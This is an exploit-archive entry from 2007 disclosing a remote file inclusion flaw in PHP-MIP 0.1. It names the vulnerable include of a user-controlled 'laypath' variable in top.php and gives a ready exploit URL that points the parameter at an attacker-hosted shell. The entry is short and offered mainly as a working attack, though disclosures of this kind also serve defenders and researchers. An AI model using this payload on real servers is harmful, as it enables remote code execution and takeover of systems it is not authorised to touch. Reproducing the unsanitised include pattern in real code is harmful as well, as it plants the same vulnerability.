[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-MIP 0.1 (top.php laypath) Remote File Include Vulnerability
# Published : 2007-02-25
# Author : GoLd_M
# Previous Title : Admin Phorum 3.3.1a (del.php include_path) RFI Vulnerability
# Next Title : STWC-Counter <= 3.4.0 (downloadcounter.php) RFI Exploit
*********************************************************************
**********************************************************************
PHP Module Implementation(top.php laypath)Remote File Include Vul ^
**********************************************************************
**********************************************************************
Downlaoad S : http://sourceforge.net/projects/phpmip/ ^
**********************************************************************
**********************************************************************
Author: GolD_M = [Mahmood_ali] && Contact: HackEr_@W.Cn ^
**********************************************************************
**********************************************************************
In: /[path]/top.php ^
**********************************************************************
**********************************************************************
Vulnerable Code: ^
**********************************************************************
**********************************************************************
include("$laypath/body.php"); Line : 23 ^
**********************************************************************
**********************************************************************
Exploit: ^
**********************************************************************
**********************************************************************
http://Victim.Com/top.php?laypath=[Shell] ^
**********************************************************************
**********************************************************************
# www.Syue.com [2007-02-25]